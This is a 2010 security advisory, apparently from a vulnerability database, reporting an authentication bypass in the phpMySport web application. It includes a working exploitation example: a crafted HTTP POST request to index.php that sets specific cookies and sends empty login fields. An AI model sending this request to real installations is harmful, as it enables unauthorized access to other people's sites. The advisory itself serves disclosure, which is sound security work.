Authentication Bypass Vulnerability in phpMySport

2010-12-21T00:00:00
ID HTB22773
Type htbridge
Reporter High-Tech Bridge
Modified 2010-12-21T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in phpMySport which could be exploited to bypass authentication mechanisms and gain access to the application.

1) Authentication bypass vulnerability in phpMySport
The vulnerability exists due to insufficient validation of input data in authentication mechanism. A remote attacker can send a specially crafted HTTP POST request to the index.php script, bypass authentication checks and gain unauthorized access to the application.
Exploitation example:
POST /index.php?r=member&v1=login HTTP/1.1
Cookie: auto_connection=1; cle=1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
login=&pass=&x=9&y=10